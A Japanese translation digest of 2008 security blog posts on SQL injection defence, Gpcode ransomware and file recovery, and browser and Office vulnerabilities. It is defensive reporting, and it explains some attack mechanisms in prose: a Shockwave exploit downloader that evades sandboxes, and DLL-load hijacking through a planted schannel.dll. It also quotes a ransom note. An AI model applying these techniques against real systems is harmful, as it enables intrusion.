 最新のAxBanは適切であるが、現在完全な既知か、極めて品質の悪い物か、危険な可能性のあるActiveXコントロールの僅かな数をリストするだけなので、今後成長の余地がある。その名声のために、Errataはアップデート機能を含ませた。これはユーザーの最終スキャン以降、この会社がフラグを立てたかもしれない新しいActiveXの脅威をチェックするだろう。

あなたのWebサイトを安全にする為のフリーツール
WashingtonPost : Security Fix (2008/06/26)

 過去数ヶ月間に渡り、数百万のWebページがハッキングされ、悪意あるソフトウェアの種を播かれた。かなり多くの場合、そのようなサイトがハッキングされた理由は、それらサイトの管理者が基本的なデータベースセキュリティ対策さえ導入していなかったためである。
 この様な改竄の大多数では、ハッカーはSQLインジェクションと呼ばれる攻撃を使用して侵入する。特定のソフトウェアのセキュリティ上の脆弱性を攻撃するというより、SQLインジェクションは、そのサイトのWebアプリケーション(ASP, CGI, PHP)のデータベースレイヤー中の設定の弱点をターゲットにしている。
 大多数のSQL攻撃はスキャンツールの手を借りて自動化されているので、SQL攻撃はWebブラウザ以外何も使用せずに実行できる。サイトが訪問者からのインプット(検索やログインのような)を受け入れる場合、インジェクション脆弱性は必ずと言っていい程存在するが、有害性のある指示、non-standard characters(【訳注】どのような文字のことかは、こちら参照。http://www.tony-franks.co.uk/UTF-8.htm)、コンピュータコードをフィルターすることはできない。
 成功したSQL攻撃は、コンフィギュレーション設定、ユーザ名、パスワード、アタッカーがそのサイト上にコンテンツを挿入することを支援できる重要なデータを、吐き出すことを強要する。
 この種の攻撃からWebサイトの保護に役立つ利用可能な幾つかのツールがある。一つ目は、"HP Scrawlr"と呼ばれるヒューレットパッカードの脆弱性スキャナの簡易版である。このツールはユーザにSQLインジェクションが疑われるか否か示唆する。このツールはヒューレットパッカードのサイトから利用可能である(無料登録が必要)。
 二つ目のソフトウェアは"UrlScan version 3.0 Beta"である。このツールはMicrosoft's Internet Information Services (IIS) Web サーバが処理するこの種のWebリクエストを制限するMicrosoftのツールである。このツールと、その詳細情報はここに見出すことができる。
 三つ目のツールは、可能なSQL攻撃の方法に関しASPコードを厳密に調べるのに用いられることができるMicrososftの作成物である。詳細な学習とダウンロードはこちらのリンクを参照。
 思い出せ。たとえWebサーバとWebアプリケーションが最新のセキュリティパッチを完全に充てられていたとしても、あなたのサイトは未だSQL攻撃の犠牲となる可能性がある。また、大多数のSQLアタックは、自動化され便乗しているだけなので意図的ではない。もし、あなたがWebサイトを運用しているのであれば、あなたの小さなWebサイトの場所をより安全にするために、この様なツールについて学び、使用することを考慮しなさい。

Gpcode続報(6)、Gpcodeに攻撃された後ファイルを復元する別法
Kaspersky : Lab Weblog (2008/06/26)

 我々はGpcodeに関する以前のブログで、我々がPhotoRecユーティリティを使用してこの様なファイルを修復する方法以外に、何とかファイルを修復する方法を発見したと発言した。
 結局、ユーザがGpcpdeで暗号化されたファイルと、暗号化されていないそれらと同一のファイルを持っているなら、そのファイルのペア(暗号化されたファイルと、それに対応する暗号化されていないファイルのペア)は犠牲になったマシン上の他のファイルの復元に使用することができる、ということが分かった。これは、StopGpcode2 ツールを使用する方法である。


    【訳注】 暗号化されているファイルが赤丸。ファイルが全て暗号化されていても(図の左上の群)、暗号化されたファイルとそれに対応する暗号化されていないファイルの幾つかのペア(赤丸と白丸の対。図の中央の下の群)があれば、StopGpcode2を使用して、全てでは無いがかなりの部分復号化(白丸)することができる(図の右上の群)。

 この様な暗号化されていないファイルはどこで発見されるのか? それらはPhotoRecを使用した結果であるかもしれない。さらには、この様なファイルはGpcodeウィルスが到達しなかったバックアップ ストレージやリムーバル メディア(例えば、Gpcodeにより攻撃されたコンピュータのハードドライブにコピーされた写真のオリジナルファイルは、未だカメラのメモリカード上に存在しているかもしれない)に発見されるかもしれない。
 この方法はユーザが影響を受けたファイルの暗号化されていない版を持っているだけでなく、感染したマシンの特性にも起因するので、ファイルが修復されることを保証できない。それでもなお、我々がテストで成し遂げた結果(暗号化されたファイルの80%を復元)は、あなたがファイルを修復する必要があるのなら、実行する価値があることを示唆している。
 発見されたファイルのペアが多いほど、復元されるデータも多くなる。
 StopGpcode2ツールの使用に関する詳細な使用説明は、Virus.Win32.Gpcode.akの説明中に存在する。

MicrosoftのWord と WordPad に脆弱性
heiseSecurity : Security (2008/06/25)

 MicrosoftのWordとWordPad中に、これらのプログラムにクラッシュを発生させる未パッチの脆弱性に関し、この脆弱性を攻撃するデモがリリースされた。彼のアドバイザリにおいて、脆弱性の著者Ivan Sanchezは、Windows XP SP2とSP3の下で、Office 2000 と 2003のWordでこの脆弱性をを再現できたと主張している。この脆弱性は不規則なリストの欠陥のあるプロセスによって発生させられると言われていた。WordPad中のセキュリティホール(Windows XP SP2とSP3の下でバージョン5.1に影響がある)に関しては詳細な情報は存在しない。他の製品バージョンもまた多分影響される。
 Sanchezはアタッカーが任意の悪意あるコードの挿入と実行するために二つの脆弱性を攻撃し成果を挙げることが可能であるかもしれないと疑っている。更に、彼はこのセキュリティホールが活発に利用されているが、詳細は伝えられていないと警告している。WordPadは標準的Windowsの一部である。Microsoftがパッチをリリースするまで、たとえユーザが今までの全アップデートをインストールしたとしても、ユーザは未知のソースからのDOCファイルを信頼しないようアドバイスされている。。

Adobe、ReaderとAcrobatをアップデート
F-Secure Weblog : News from the Lab (2008/06/21)

 Adobeは月曜日、この人気あるソフトウェア中の二つの深刻なフローを塞いだReaderとAcrobatのアップデートをリリースした。
 各アプリケーションのバージョン8.1.2に対するパッチは、悪人が脆弱性あるシステムにマルウェアをドロップする手段を作成する脆弱性を解決している。このソフトウェアの以前のバージョン(Adobe Reader 7.1.0 と Acrobat 7.1.0)のユーザは、このバグの危険に曝されていない。来月出現する各ソフトウェアのバージョン9もまた安全である。とAdobeは報告している(http://www.adobe.com/support/security/bulletins/apsb08-15.html)。
 このソフトウェアの開発者は、このフローを発見に関しJohns Hopkins University Applied Physics Laboratoryの科学者と契約している。このバグのAdobeの説明は、この問題の源泉についての多くを明かにすることなしに、彼らの衝撃を表している。「深刻な脆弱性はAdobe ReaderとAcrobatのバージョン8.1.2と、これらの早期バージョン中で同定された。この脆弱性は、このアプリケーションをクラッシュさせるだろう。そして、アタッカーが影響を受けたシステムの制御を奪うことを許可する可能性がある。」と記述している。
 The SANS Institute's Internet Storm Centerは、この脆弱性がそれ自身でボットネットが脆弱性を攻撃し成果を挙げることに手を貸すかもしれないと警告している(http://isc.sans.org/diary.html?storyid=4616)。SANSはなるべく早急にユーザのシステムをアップデートすることをアドバイスしている。

良くできたキー
F-Secure Weblog : News from the Lab (2008/06/21)

 私はバージョン2.1以来PGP (Pretty Good Privacy)を使用している(【訳注】このソフトは、バージョンによって日本語化パッチが配布されています。検索してみてください。)。
 最初の公開鍵と秘密鍵のペアを作成したのは1993年3月だった。その時のスクリーンショットがある

 見ての通り、私は満足なキーの長さに関する必要性を過小評価していた(384-bit RSAキー)。
 キーの長さは1993年には重要であった。我々はその当時486プロセッサを稼働させていたが、長いキーを使用すると重かった。
 しかしながら、私が384-bitでは十分で無いことに、そしてFactoring Technology(【訳注】例えば、公開鍵をクラックする方法)は進歩し、コンピュータはよりパワフルになるだろうから、私のキーが最終的にクラック可能であるということを認識するのに時間はかからなかった。
 そこで私は決心し新しいキーのペアを作成した。この時は1024-bitキー長という途方もないものだった。
 私は1993年の真夏の夜を、この新しいキーのペアを作成するために費やした。そして新たなキーは十分な長さであった。重かった、しかし十分な長さであった。
 事実、私は今日もなお、このキーペアを毎日のごとく使用している。新しいキーのペアを作成する必要は全くなかった。
 1994年頃、私はDr. Vesselin Bontchevに私のキーお裏書させた。これは素晴らしかった。なぜなら、VesselinのキーはPGPのPhil Zimmermanによって裏書されていた。
 1993年の真夏の夜(6月21日)であった。これは本日私のキーが15歳になったことを意味している。
 キー0F265709、誕生日おめでとう。良く勤めを果たした。

Apple、Windowsセキュリティフローに関するSafari修正版をリリース
WashingtonPost : Security Fix (2008/06/19)

 Appleは今日、Microsoft Windowsユーザ用Safariブラウザの新たなバージョンをリリースした。最新のバージョンは四つのセキュリティホール(Windowsデスクトップにファイルの自動ダウンロードを許可する脆弱性を含む)を塞いでいる。幾つかの場合、このファイルはユーザの認識無に起動される。
 Safari version 3.1.2は、フロー(ユーザのWindowsデスクトップを「絨毯爆撃」する、あらゆる詐欺Webサイトを許可する)を修正している。その時点で、この脆弱性はダウンした多くの人々のその酷さを初めて詳にした。しかし先週のSecurity Fixによる独占インタビューで、研究者Liu Die YuはWindowsマシン上で彼の悪意あるコードの脆弱性の証明を、まさにWindowsユーザがSafariでリンクをクリックすることを説得することによって自動的に起動せしめた方法をデモした。
 AppleはSafariの二つの挙動を変更することでこの問題を修正したと発言した。まず、新しいバージョンはもはやWindowsデスクトップ上にファイルを保存しない。正しくは、Vistaでは、SafariはDownloadフォルダにファイルを保存する。XPではユーザのドキュメントフォルダにそれらを安全に保存する。更にAppleは、Safariがもはやファイルを自動的にダウンロードせず、ファイルのダウンロードに先立ってユーザにプロンプトを表示すると発言している。
 新しいバージョンはApple Downloadから、もしくはWindows用Safariに同梱されているApple Software Updateを使用して利用可能である。

Shockwaveに脆弱性
Kaspersky : Lab Weblog (2008/06/19)

 我々は、ある興味あるテクニックが、研究者達から悪意あるコードを隠蔽することを発見した。
 初感染は汎用のWebページ上のiframe挿入であった。iframeページはちっぽけなShockwaveファイル(わずか158バイト)をロードした。

 このファイルはユーザのOSとShockwaveファイルを操作するためのプラグインのバージョンを取得するため、内部ActionScriptグローバル変数("$version")を使用している。この$version変数は、"WIN 9,0,12,0"(ショートプラットフォーム名)、Adobe Flash Playeプラグインのバージョンとレビジョン番号のような物の値を求める。この4561.SWFがダウンロードを試みた後、この文字列をベースにして他の .SWF を起動する。上述の場合、"WIN 9,0,12,0i.swf"ファイルのダウンロードを試みた。このサーバは有名な ERROR 404: “File Not Found” で応答した。しかし、これは目的のために実行されていた。4561.swfファイルは自動化されたSandBox上でテストされるので、研究者は二つ目の .SWF ファイルが供給されなかったことが、そのサーバ上に悪意あるコードが存在しないことに起因するのではなく、SandBox中に使用されている様々なAdobe Flash Playerプラグインに起因するという事実に気付かないかもしれない。
 私は可能なバージョンの全てをチェックした。そして6つの異なる .SWF 脆弱性を発見した。
 ここに私が発見したファイルのリストを挙げる。

    WIN 9,0,115,0i.swf
    WIN 9,0,16,0i.swf
    WIN 9,0,28,0i.swf
    WIN 9,0,45,0i.swf
    WIN 9,0,47,0i.swf
    WIN 9,0,64,0i.swf

 これらファイルは Exploit.SWF.Downloader.c として我々のエンジンによって既に検出されているが、これらの新しい変種はマルウェアコレクション中に存在していなかった。Exploit.SWF.Downloaderの最初のサンプルは、2008-05-27に検出された。
 この脆弱性を突き功績を上げる行為は、Adobe Flash Playerの脆弱性(不適切な画像サイズ操作上に構築されている)を使用する。私は内部に誤った画像サイズで埋め込まれているJPEGデータを発見した。

 そこで、一線を画す為に、私はこの技術がAdobe Flash Playerプラグインの特定のバージョンの特定の脆弱性を攻撃する物を注意深くダウンロードすることを可能にしていることを、そして同時に、物見高い研究者から実際の悪意あるコードを隠蔽することが可能であることを繰り替えしたい。

Firefox 3 に脆弱性
F-Secure Weblog : News from the Lab (2008/06/19)

 Firefox 3 がコード実行脆弱性を持っていることが報告され苦しんでいる。
 Firefox 3 のリリースの凡そ5時間後、TippingPoint's Zero Day InitiativeはFirefox 3.0に影響する深刻な脆弱性を受け取った。Firefoxの以前のバージョンも影響を受ける。
 TippingPointはこの脆弱性(この研究者から得た)を確認し、次にMozillaにコンタクトした。修正は現在進行中である。更なる詳細はTippingPointで読むことが可能である。
 TippingPointはこの脆弱性に関するいかなる技術的詳細も露にしていない。彼らはパッチが利用可能になるまで公開しないだろう。この脆弱性はE-Mail中のリンクをクリックしたり、悪意あるページを訪問したりするような幾許かのユーザの相互作用を要求する。
 フィールド中にこの脆弱性を攻撃した事例は存在しないので、最善のアドバイスはMozillaの修正を待っている間はベストなブラウジングの実行を維持することである。あなたがFirefoxで確認することは、自動アップデートを設定することである。

Gpcode続報(5)、Gpcodeアップデート
Kaspersky : Lab Weblog (2008/06/17)

 我々のGpcodeプロジェクトは、脅迫ウィルスのパズルを解くことに興味を持っている研究者や組織から多くの興味を惹いた。全てのフィードバックに感謝する。
 他のことで、我々はこのウィルスの繁殖方法について多く尋ねられた。幾つかの感染したコンピュータの解析で、我々はこのウィルスが他の悪意あるプログラム(トロイの木馬ダウンローダー[Trojan-downloader]の機能付きBot)の支援で犠牲者のマシンに乗り移るという決定に至った。犠牲になったマシン上にGpcodeが現れる前に、この悪意あるプログラムで感染させられる。このBotはGpcodeウィルスに加えてあらゆる種類のトロイの木馬をダウンロードする。
 RSA秘密鍵は発見されていないが、幾つかの興味深いアイデアが浮上している。具体的には、Gpcodeによって使用されるアルゴリズムの詳細な解析は、このウィルスの製作者が秘密鍵無に暗号化されたファイルを復号化することを可能にする(特定の条件下で)エラーを行っていることを示していた。
 この方法は犠牲になったコンピュータ上の暗号化されたファイルの0%から98%を修復する。結果は幾つかのファクター(攻撃されたシステムを発端とする)に依存する。現時点で、標準的なコンピュータから修復することのできるファイルの平均数を与えることは不可能である。
 Kasperskyの研究者は現在、この新しい方法を活用するファイル修復ユーティリティを作成するために頑張っている。

Gpcode続報(4)、Gpcodeによって攻撃されたファイルの復元
Kaspersky : Lab Weblog (2008/06/13)

 現在、秘密鍵無にGpcode.akによる暗号化ファイルを復号化することは不可能である。しかしながら、暗号化されたファイルを元の状態に修復することは可能である。
 ファイルを暗号化するとき、Gpcode.akは暗号化しようとするファイルの傍に新しいファイルを作成する。Gpcodeは元のデータからこの新しいファイルに暗号化されたデータを書き込み、次にオリジナルのファイルを削除する。
 ディスク上のデータは明瞭な改変がなされない限り、削除されたデータを復元することが可能なことは既知である。これが、当初から我々が感染したコンピュータを再起動しないように、もしくは代わりに我々にコンタクトをとるか、ユーザに勧告してきた理由である。我々はディスクから削除されたファイルを復元するため、ある分野のユーティリティを使用することを我々にコンタクトしたユーザに告げている。残念なことに、利用可能な殆ど全てのユーティリティはシェアウェアである。我々はGpcodeで削除されたファイルの復元を支援できる効果的でアクセス可能なユーティリティを案内することにした。
 我々は何に決定したのか? PhotoRecと呼ばれる優秀なフリーツールである。このツールはCristophe Grenierによって作成され、GPLライセンスの下で配布されている
。  このユーティリティは本来グラフィックファイルの復元用に作成された(おそらくPhotoRecと呼ばれる理由は、Photo Recoveryの省略だからだろう)。後に、この機能は拡張された。このユーティリティは現在、Microsft Officeドキュメント、実行ファイル、PDF、TXTドキュメント、様々なファイルアーカイブの復元にも使用される。
 ここでサポートされるフォーマットの完全なリストを見つけることができる。公式のPhotoRecユーティリティサイトはこちらである。PhotoRecユーティリティはTestDiskパッケージの一部である。TestDiskの最新バージョン(PhotoRecはこれに含まれる)はここで見つけることができる
 PhotoRecはデザインされている業務(特定のディスク上のデータファイルの復元)に優れている。しかしながら、正確なファイル名とパスを復元することは困難である。この問題を解決するために、我々は小さなフリーのプログラムStopGpcodeを開発した。
 あなたがGpcodeの生贄になったなら、データを復元するために、このウィルスの製作者に金銭を支払ってはならない。代わりにPhotoRecを使用しなさい。望むならこのプログラムの製作者へ寄付することができる。
 Gpcodeの説明はPhotoRecとStopGpcodeを使用して、このウィルスによって攻撃されたファイルの手動復元方法の詳細な指示を含んでいる。

Opera 9.5 アンチマルウェアプロテクションを搭載
WashingtonPost : Security Fix (2008/06/12)

 Opera Softwareは本日、悪意あるソフトウェアをインストールしようとするWebサイトからユーザを保護することを支援するだろうと、Opera Softwareが発言した、そのWebブラウザの新しいバージョンを出荷した。新しいバージョン(Opera 9.5)はここで利用可能である。
 Operaはアンチマルウェア性能を含ませた最新のブラウザメーカーである。IE8のベータ版とFirefox 3は共に類似の機能を含んでいる。
 OperaスポークスマンThomas Fordは、新しいソフトウェアのマルウェア防止性能はシアトルに本拠を置くHaute Secureに由来する。このセキュリティ会社は四人の前Microsoft社員によって始められた、と発言している。あるOperaユーザがHauteのブラックリストに含まれているサイトを訪問しようとしたら、Operaは、このページは悪意あるソフトウェアを配布していると報告されている、と言う不正サイト警告を表示するだろう。

 FordはFirefoxのようでなく(FirefoxはStopbadware.orgとの協力を通してGoogleによって提供される危険なサイトのリストを毎日ダウンロードする)、Opera 9.5はロードされた各ページをHauteのデータベースと照合することに注目している。Fordは、このブラウザがパケットを送信するために、喩えダイヤルアップユーザでさえブラウザをスローダウンすることなしに加えられたコミュニケーションを操作できると発言している。Hauteのサーバはちっぽけである(1Kb以下)  HauteマーケティングのチーフSteve Andersonは、この会社のデータベースはGoogle(SpamhausとPhishtank.comからのからの情報に加え)からのフィードによっても情報を与えられていると発言している。しかし、彼はそのブラックリスト上のブロックされるドメインの大半は、Webまわりの悪意あるリンクとページの彼ら自身のインデックス化に由来すると発言している
 Operaの新しいバージョンは、高速で、巧妙で、大変直感的であると感じる。しかし、私はマルウェアブロッキング機能に失望させられ続けてきた。私のアンチマルウェアテストドライブで、このブラウザにmalwaredomainlist.comでリストされているリンクのページを設定した。このブラウザはほぼ3ダースのアクティブで悪意ある最初のページのリンクのうちの二つだけをブロックした。
 私はこれが大変非科学的であることを認識しているが、これらリンクの幾つかは何日も経っている物である。HauteのAndersonは、彼らがマルウェア ロケーションデータのソースを含めることを受け入れたと発言している。私はHauteが、この機能に対するそのブロックリストをmalwaredomainlist.comに拡張すること希望する
 あなたが現在Operaユーザであり、アップグレードを躊躇しているのであれば、アップグレードを実行する二つ以上の理由がある。このアップグレードは最新の三つのセキュリティホールと、このブラウザの以前のバージョンで発見された凡そ2,350のバグを塞いでいる。

Gpcode続報(3)、犠牲者になるな
Kaspersky : Lab Weblog (2008/06/09)

 まったく新しいGpcodeの出現は私に攻撃者と一般的な犠牲者について考えせしめた。そう、Gpcodeによって使用されている、このキーの復号化は難題であり成功の保証は無い。常識は高度な技術同等に重要であるということを全ての人に思い出して欲しい。
 犠牲者の一部における無抵抗はサイバーアタッカーに自由な支配権を与える。Gpcodeでデータを失い、それを回復したくてたまらないのであれば、降参しegoldアカウントの購入を急いでさえ、あなたは未だこの背後にいる誰かを止める支援をすることができる。脅迫者へPINコード(【訳注】Personal Identity Number(個人識別番号)の略)を送信するな。あなたが使用しているeペイメントのサポートサービスに対しコピーを送信しなさい。これは犯罪者の追跡調査を助けるだろう。犯罪者を追跡することは、彼らが現行犯を逮捕されることさえ意味している。
 他方、何らかの行動を起こすことに失敗した犠牲者は、犯罪者が決して捕まらないことを保証する。これは新たな犠牲者が生まれることを意味している。あるいは、同じ犠牲者が何度も何度も繰り返し犠牲者になるだろう。
 最終的に、この問題に関する四番目のポストが誰かを誤解させないことを希望する。Gpcodeは蔓延していない。我々は今迄限定的な数しか見ていない。
 しかしながら、技術的問題はさておき、それが世界的問題であることを継続するのはユーザの意識性である。犠牲者であることを止める。データをバックアップする。Gpcodeに関するコンテキスト中の上述の私のコメントを受け止める。次に、このコンテキスト同様にあなた自身の情報セキュリティをを再検討しなさい。

Windows上のSafari脆弱性を再訪する
WashingtonPost : Security Fix (2008/06/09)

 一週間位前、Windows版のApple Safariブラウザに新たな脆弱性があるとするMicrosoftのセキュリティアドバイザリの警告について記述した。特にMicrosoftは、その脆弱性がWindowsデスクトップにファイルの自動ダウンロードを許し、ある場合では、ユーザの認識無にファイルを稼働することを許すと発言した。
 週末にかけて、この脆弱性がSafariでの問題というよりむしろWindows中の設計フローであると指摘する著名なセキュリティ研究者(この脆弱性に関する「脆弱性の証明」をやり遂げた)の意見を聞いた。
 そのコードはLiu Die Yu(Windowsの、とりわけInternet Explorerの幾つかのセキュリティホールを発見したことで高い評価を受けている)の解析によって生まれた。Windows上のSafariでこのテストリンクを訪問したなら、自動的に無害な"schannel.dll"と呼ばれるファイルがダウンロードされる。そのファイルは短いスクリプトを含んでいるので、次回Internet Explorerを起動したら、そのファイルはWindowsのDefaultのエディタであるメモ帳を起動する。
 これはむしろおとなしい例であるが、この脆弱性コードは、犠牲者のマシンからデータを盗んだり、ろくでもないソフトをインストールしたりするような何かを実行するよう構築できる。しかし、ポイントはオペレーティングシステムがデスクトップに9行のコードを書くことをサードパーティー製ブラウザに許すなら、それはWindows上のあらゆるアプリケーションを自動的に許可し起動することだ、と言うことである。これは恐ろしく巨大なセキュリティホールである。
 Liu Die Yuは、この脆弱性がWindows XPとVista上の全てのバージョンのIE(最新のIE8ベータを含む)で稼働するということを、私に告げた。私はWindowsXP上のIE6とIE7で確認できたが、Vista(Ultimate)上では、この脆弱性が動作することを確認できなかった。MicrosoftのアドバイザリはVistaでも同様に脆弱性があると発言している。
 Liu Die Yuが言及していることとして、この脆弱性は新しい物ではない。研究者Raffは、MicrosoftがIE7をリリースした初期の2006年11月に、この脆弱性を警告している。Raffはその時、IEの新しいバージョンでさえ、彼が”DLL-load hijacking”と呼んだ脆弱性が存在すると説明していた。
 Dynamic-link library (DLL、ダイナミック リンク ライブラリ)ファイルは、プログラムをモジュール化する方法を提供するので、プログラムの機能をアップデートしたり再利用することがより容易なので、Windows上で幅広く使用されている。DLLはまた、複数のプログラムが同時に同じ関数を使用したとき、システムメモリリソースの負担の減少を支援する。なぜなら各プログラムが、そのDLLのデータのそれ自身のコピーを受けとるので、アプリケーションは同じDLLコードを効果的に共有できる。
 Raffは、IEが最初に稼働したとき、幾つかのDLLファイルをロードするため、IEが根本的にDLLハイジャッキングの脆弱性があることを発見した。しかし、Windowsは、このようなDLLファイルを発見するための特別の指示を頑なに提供していない。結果として、Windowsはユーザのマシン上でこのようなDLLファイルを探すだろう。そして、それは探しているファイル名にマッチした最初のDLLをロードするだろう、と発言している。
 Raffは、defaultでWindowsがIEディレクトリ後直ちに、現在のファイルディレクトリ中のDLLを探すことに注目している。大多数のユーザはデスクトップ上のIEアイコンをクリックすることでIEを起動している。大抵の場合、その現在のファイルディレクトリはユーザデスクトップであるだろう(Raffはこのフローのちょっとした詳細を説明するために続報をポストした。この問題に関する彼の最新のポストはこちら)。
 では、何故Liu Die Yuの「脆弱性の証明」は動作するのか? IEが起動した時、IEが探すDLLの一つが"schannel.dll"であるのが理由である。同じな前の彼の脆弱性の証明用DLLをコールし、それをデスクトップ上に置くことで、Liu Die YuはIEがコアDLLファイルを、もはや探す必要のないことを保証する。
 さらに悪いことに、Raffは攻撃者は彼らの毒のあるDLLファイルをWindowsデスクトップ上にドロップする必要が無いことに注目している。攻撃者はWindowsの”hidden”ファイル属性を設定することで、そのファイルを隠すことができる。defaultでWindowsは隠し属性ファイルを表示しないし、大多数のWindowsユーザは決してこのオプションを変更しない(Windowsで隠し属性ファイルを表示する為には、Windows EXplorerを開き、ツール>フォルダオプション>ビューに進み、「隠し属性のファイルとフォルダ」の下のセクションのラジオボタンの選択を変更する)。
 先月発行されたアドバイザリで、Microsoftは、この脆弱性を修正するためのセキュリティアップデートを発生させるかもしれないと発言した。私の意見は、Microsoftがまもなくそれを実行するだろうということである。これはセキュリティ上の脆弱性のように見えるが、Safariだけでなく、Windows用のサードパーティーソフトウェアアプリケーションの幾つかを経由して、この脆弱性を攻撃することが出来るので、私はそのリリースが遅いよりむしろ直ぐにでも発生すさせることを希望する。

Gpcode続報(2)、Gpcodeのクラックを支援せよ
Kaspersky : Lab Weblog (2008/06/06)

 昨日のVitaryの投稿(【訳注】下の「Gpcode、ファイル暗号化マルウェアの回帰」参照)を読んだのなら、2008年6月4日に我々がGpcode(危険なファイル暗号化マルウェア)の新たな変種を検出したことを知っているだろう。このウィルスによって使用された暗号化アルゴリズムの詳細とGpcode.akの説明は、Vitalyの投稿に詳しい。
 世界中のアンチウィルス会社とともに、我々はRSA 1024-bitキーのクラック業務に直面している。これは巨大な暗号法への挑戦である。我々はこのようなキーをクラックするには、最新のコンピュータ1500万台を凡そ一年稼働させなければならないだろうと見積もっている。
 もちろん、我々はその種の計算能力を持ったコンピュータを持っていない。これが我々が共同して仕事する必要のある論拠であり、我々が収集した全ての知識を申し出、この問題のリソースを提供する論拠である。
 そこで我々は呼びかける。暗号化研究者、行政機関、科学組織、アンチウィルス会社、独立した研究者...Gpcodeを停止するために我々に共同せよ。これは独自の企画である(理論や悪意の考察よりむしろ、倫理を超越した知力とリソースの結合である)
 ここにGpcodeの著作者が使用した公開鍵がある。
 最初はWindows XPとそれ以降のOSで暗号化するために使用された。

    Key type: RSA KeyExchange
    bitlength: 1024
    RSA exponent: 00010001
    RSA modulus:
    c0c21d693223d68fb573c5318982595799d2d295ed37da38be41ac8486ef900a
    ee78b4729668fc920ee15fe0b587d1b61894d1ee15f5793c18e2d2c8cc64b053
    9e01d088e41e0eafd85055b6f55d232749ef48cfe6fe905011c197e4ac6498c0
    e60567819eab1471cfa4f2f4a27e3275b62d4d1bf0c79c66546782b81e93f85d

 二回目は、Windows XP以前のバージョンで暗号化する為に使用された。

    Key type: RSA KeyExchange
    bitlength: 1024
    RSA exponent: 00010001
    RSA modulus:
    d6046ad6f2773df8dc98b4033a3205f21c44703da73d91631c6523fe73560724
    7cc9a5e0f936ed75c75ac7ce5c6ef32fff996e94c01ed301289479d8d7d708b2
    c030fb79d225a7e0be2a64e5e46e8336e03e0f6ced482939fc571514b8d7280a
    b5f4045106b7a4b7fa6bd586c8d26dafb14b3de71ca521432d6538526f308afb

 二つのキーのRSAの暗号化指数は、0x10001 (65537)(【訳注】0x10001は16進数で10001の意味。これを十進数に変換すると65537)である。
 上述の情報は、キーを因数に分解するのに十分である。特別に作成されたユーティリティはファクタリングに重大な支援となるだろう。
 我々は、Gpcodeを停止しようとしている誰にでも追加情報を提供する用意がある。全ての人が最新知識を維持するために、我々は専用のフォーラムを設立した。

Gpcode続報(1)、警告を思い出せ
Kaspersky : Lab Weblog (2008/06/05)

新たなGpcodeの変種についてVitalyの投稿に続いて、私はまさに全ての人が自身のデータをバックアップすることを思い出すだろうと考えている。Gpcodeの生贄となりファイルを暗号化されたのであれば、この方法は少なくとも幾多の価値ある情報を失わずに済む。

Gpcode、ファイル暗号化マルウェアの回帰
Kaspersky : Lab Weblog (2008/06/05)

 我々はGpcodeの新たな変種(危険なファイル暗号化ソフト)を検出した。これはユーザの全ての種類のファイル(DOC, TXT, PDF, XLS, JPG, PNG, CPP, H etcのような拡張子付きのファイルをターゲットにしている)を暗号化する。あなたがViruslistの常連であるなら、二年前にGpcodeに関して読んだことを思い出すかもしれない。
 我々は最近、感染の犠牲者からレポートを集め始め、サンプルを分析した。そして、昨日(6月4日)我々のアンチウィルスデータベースにGpcode.akの検出を加えた。しかしながら、我々はウィルスそれ自身を発見したが、Gpcode.akによって暗号化されたファイルを複号化することは現在できていない。マルウェア中で実行されているRSA暗号化は大変強力(1024bitキー)に使用されている。
 RSA暗号化アルゴリズムは二つのキー(公開鍵と秘密鍵)を使用する。メッセージは公開鍵を使用して暗号化されるが、秘密鍵を使用することでのみ復号化される。これがGpcodeが動作する方法である。Gpcodeは、そのBody中にコードされている公開鍵を使用して犠牲者のマシン上のファイルを暗号化する。一旦、暗号化されたなら、ファイルは秘密鍵を持つ者(この場合は、悪意あるプログラムの著作者もしくは所有者)によってのみ復号化される。
 上述したように、我々は以前Gpcodeに遭遇していた(詳細はBlackmailer参照)。二年前、我々は処理装置でデータの詳細な解析を行うことによって秘密鍵の取得に成功した。しかしながら、我々がデータを「クラックする」ことのできたRSAキーの長さの最大値は660ビットである。我々は暗号化アルゴリズムの実装に著作者が幾つかの失敗をしていたので、これを実行することが可能であった。
 著作者は好機を待った。このファイル暗号化マルウェアを改善した新たな変種を作るまで凡そ二年待ちつづけた。Gpcode.akはこのウィルスの以前のバージョンで発見されたエラーを繰り替えしていない。我々がGpcodeの最初のバージョンがRSAを使用していることを検出した2006年に戻る。これは、このウィルスの著作者が正しくRSA暗号化アルゴリズムを実装したなら、暗号化ファイルの復号化を支援することはできなくなると言う警告を発っせさせた。この方法でファイルを暗号化する行為は、説明無にユーザの感染したマシンから彼自身のマシンにユーザのファイルをコピーし、それらを削除するサイバー犯罪(不法行為)と同等であるので、これは法の執行に関する論拠になるだろう。
 このウィルスはユーザのファイルを暗号化すると、ファイルの暗号化を実行したとする以下のテキストメッセージを残す。

    Your files are encrypted with RSA-1024 algorithm.
    To recovery your files you need to buy our decryptor.
    To buy decrypting tool contact us at: ********@yahoo.com?
    -----------------------
    あなたのファイルはRSA-1024アルゴリズムで暗号化された。
    修復するには我々の複合化ツールを購入する必要がある。
    復号化ツールを購入するには、********@yahoo.comで我々にコンタクトしなさい。

 残念ながら、記述している時点で、このウィルスの拡散方法が未だ明らかになっていない。あなたのマシンを守るためには、インストールしている全てのアンチマルウェアソフトの全てのコンポーネントを有効にしなければならないだろう。
注意 ! あなたのコンピュータ上に以下のメッセージを発見したなら

 100%の確率で、Gpcode.akによって攻撃されている。この場合、他のインターネットに接続しているコンピュータを使用して我々(【訳注】Kaspersky)にコンタクトしなさい。潜在的に感染しているマシンを再起動したり電源を切ったりするな。
 stopgpcode@kaspersky.comにメールを送信することで我々にコンタクトしなさい。そして、実在するデータと感染の日付を我々に伝えなさい。同様に、そのマシンが感染する5分前に、あなたが実行した全てのことを我々に伝えなさい。

    ・ あなたが実行したプログラムは何か?
    ・ あなたが訪問したWebサイトは何処か? 等

 我々は暗号化されたあらゆるデータを修復するためにあなたを支援するだろう。
 我々のアナリストは秘密鍵無に入る復号化の方法を探してウィルスコードの解析を継続している。他方、あなたのWebサーフィンとE-Mailを読むことに格段の注意を払っている。あなたが上述のメッセージを発見したなら、我々の指示に従いなさい。
 我々は、更なるニュースを得たならアップデートをポストする

Windows版、Apple Safari複合型脅威の続き
Sunbelt : Blog (2008/06/02)

 Safariの複合型脅威に関するMicrosoftの最近の勧告について多少の困惑があるのは、あなただけではない。
